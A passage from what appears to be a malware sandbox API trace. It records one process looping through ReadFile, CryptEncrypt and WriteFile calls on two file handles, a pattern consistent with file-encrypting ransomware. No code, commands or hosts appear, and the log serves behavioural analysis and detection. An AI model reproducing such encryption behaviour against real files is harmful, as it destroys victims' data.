hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.649] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.649] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.650] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.650] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.650] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.650] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.650] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.650] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.650] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.650] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.650] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.650] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.650] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.650] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.651] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.651] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.651] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.651] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.651] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.651] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.651] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.651] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.651] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.651] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.651] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.651] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.652] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.652] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.652] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.652] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.652] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.652] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.652] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.652] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.652] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.652] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.652] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.652] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.652] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.652] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.653] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.653] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.653] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.653] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.653] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.653] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.653] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.653] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.654] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.654] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.654] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.654] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.654] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.654] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.654] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.654] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.654] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.654] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.654] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.654] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.655] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.655] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.655] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.655] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.655] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.655] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.655] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.655] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.655] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.655] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.655] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.655] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.655] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, 